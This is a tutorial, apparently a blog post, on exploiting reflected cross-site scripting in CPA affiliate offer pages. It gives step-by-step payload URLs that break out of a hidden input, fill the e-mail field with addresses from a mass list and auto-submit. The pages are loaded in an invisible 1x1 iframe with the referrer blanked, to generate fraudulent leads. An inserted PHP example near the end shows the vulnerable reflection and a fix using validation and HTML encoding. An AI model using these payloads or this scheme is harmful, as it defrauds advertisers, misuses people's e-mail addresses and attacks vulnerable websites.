We will navigate through the tutorial using the scientific method because I am extremely bored.
Question
Can we effectively integrate a javascript injection into a URL to be loaded into an iframe so that the form will automatically fill and submit?
Background Research
I already knew how to do a javascript injection directly from the address bar by erasing everything from the bar and typing code, such as:
javascript:alert("Injection.");
which would cause the message "Injection" to pop up on the screen.
However, I needed something that could be appended to a URL so that I could easily put it into an iframe on my site. I searched Google and found the XSS (Cross Site Scripting) Cheat Sheet at ha.ckers.org, and used its first example to concoct my own injection.
Hypothesis
With the proper injection string, code can be appended to the end of a query string parameter, using techniques inspired by PHP injection, to close the hidden input field that holds the parameter and insert our own markup that executes javascript.
Materials
You will need:
Large e-mail list
Website
CPA network membership
Knowledge of how to retrieve and update your e-mail list
Procedure
1. You will need to test your e-mail submit CPA offers to see if they can be exploited. Please note that you will need to use your offer's real URL rather than your CPA tracking link.
To test for an exploit, add the following code to the end of the URL then load the page:
"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{alert("Exploited.");});</script>
So your URL will look like:
http://offerplace.com/index.php?id=388&ad=239"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{alert("Exploited.");});</script>
Your offer's URL most likely has parameters that tell it who's accessing it and who to credit the lead to. It looks something like ?id=293&ad=2898 etc. You've seen them before. Usually, the CPA pages store these values in hidden input fields on the page, so those parameters would end up looking like:
<input type="hidden" name="id" value="293">
<input type="hidden" name="ad" value="2898">
As you can see, the parameters are placed straight into the HTML. So if you add your javascript injection onto the last parameter, you can directly manipulate the HTML.
The last parameter in my example was &ad=2898. What if you edited it so you can manipulate the page? Changing it to &ad=2898"><img src="http://site.com/img.jpg adds an image to the page.
Basically, what the site is doing is this:
<input type="hidden" name="ad" value="{your parameter}">
So if you change it, it becomes this:
<input type="hidden" name="ad" value="2898"><img src="http://site.com/img.jpg">
The "><img src="http://site.com/img.jpg part is our "parameter" (*wink*) that we passed. As you can see, we left out the closing "> in the URL parameter because the site is designed to add that automatically, since it thinks it's going to be given a proper value such as 2898. So you can add images…or javascript code.
2. Now that that rambling is done, we can move on to the actual exploit. You need to find the name of the e-mail input field. If you know how to do this, then great. If not:
Load up the offer's source code (View>Source, Page>View Source, Tools>View Source; there are many ways depending on the browser). Hit CTRL+F and search for "<form". This will find the form.
Find the inputs (they begin with "<input") and find one that is obviously an e-mail input. E-mail submit pages usually only have 1 or 2 inputs so it won't be hard to find. It will say "E-mail" next to it, or the name attribute (name="") will say "email", "em", "appData[em]" or something like that.
Once you find it, take note of what the name attribute is (<input type="text" name="myEmail"> -> name is myEmail).
3. We need to edit our injection to make sure we can inject an e-mail into the form. If your first injection test worked, this will most likely work as well. So load up the offer again without any injection code, just the plain, original URL, and add the following to the end of the URL:
"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";});</script>
So your URL will look like:
http://offerplace.com/index.php?id=388&ad=2398"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";});</script>
You will need to replace "email" in document.forms[0].email with the input name you got in step 2.
Load the page and now the input box should say "email@email.com".
4. If step 3 worked, we can move on. If not, make sure you used the correct input name and kept the proper syntax I provided. If you're sure you did it right and it still doesn't work, then move on to a new offer.
All we need to do now is add one bit of code to submit the offer. So, again with the original URL of the offer, add the following:
"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";document.forms[0].submit();});</script>
So again, your URL will look like:
http://offerplace.com/index.php?id=388&ad=2398"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";document.forms[0].submit();});</script>
Load the URL and your form should fill with "email@email.com" then submit automatically.
5. If step 4 worked, all you need to do is include that URL in an iframe. You must use single quotes to enclose the iframe attributes since our URL uses double-quotes and you must keep those double quotes.
So:
<iframe src='http://offerplace.com/index.php?id=388&ad=2398"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";document.forms[0].submit();});</script>' width='1' height='1' frameborder='0' scrolling='no'></iframe>
You may want to blank your referrer with referer.us. So you would just insert "http://referer.us/" before the URL. Your injection will still work.
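As an added example (not code from the original tutorial), this PHP shows the reflection explained in step 1 beside the fix a site owner would apply: validate the numeric tracking id, then HTML-encode anything written into an attribute. The function names and the example.invalid URL are assumptions.

```php
<?php
// Added example, not code from the original tutorial: the reflection it relies on
// (step 1) and the server-side fix. Function names here are hypothetical.

// Vulnerable: the raw query value is concatenated into a double-quoted attribute.
// A value containing "> terminates the <input> tag and everything after it is
// parsed as new markup, which is exactly what the tutorial's payloads rely on.
function render_hidden_vulnerable(string $name, string $value): string
{
    return '<input type="hidden" name="' . $name . '" value="' . $value . '">';
}

// Fix, part 1: the tracking parameters are numeric ids, so reject anything that
// is not a plain positive integer before it reaches the template at all.
function tracking_id_or_null(?string $raw): ?int
{
    $id = filter_var($raw ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Fix, part 2: whatever is emitted into an attribute is HTML-encoded with
// ENT_QUOTES, so " becomes &quot; and < becomes &lt;; the value can no longer
// close the attribute or open a <script> tag.
function render_hidden_safe(string $name, string $value): string
{
    $esc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="' . $esc($name) . '" value="' . $esc($value) . '">';
}

// Constructed input with the shape of the tutorial's tampered "ad" parameter.
$ad = '2898"><script src="http://example.invalid/x.js"></script>';

echo "vulnerable: ", render_hidden_vulnerable('ad', $ad), PHP_EOL;
echo "encoded:    ", render_hidden_safe('ad', $ad), PHP_EOL;

$id = tracking_id_or_null($ad);
if ($id === null) {
    // In a real request handler: http_response_code(400); exit;
    echo "validated:  rejected, ad is not a positive integer", PHP_EOL;
} else {
    echo "validated:  ", render_hidden_safe('ad', (string) $id), PHP_EOL;
}
```

Run it with the PHP CLI (php example.php) to see the three renderings side by side; the encoded and validated forms are the ones a landing page should emit.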
Conclusion
You can use this on virtually any web page to turn every visitor into a lead as long as you have a lot of valid e-mails. You will need a way to access your e-mail database and mark them as "used" once you use it to submit your offer. I don't teach that here but the way I do it is with a MySQL database.
I have a table called "mass_mail" with one field called "email" and one called "used". I select the first e-mail where "used" equals "no", use it for the offer, then update "used" to say "yes".
You could also use a PHP array:
$emails = array(
    1 => array(
        "email" => "email_address",
        "used" => "no"
    ),
    2 => array(
        "email" => "email_address",
        "used" => "no"
    )
);
and then search it for the first unused e-mail.
Or store them in a text file.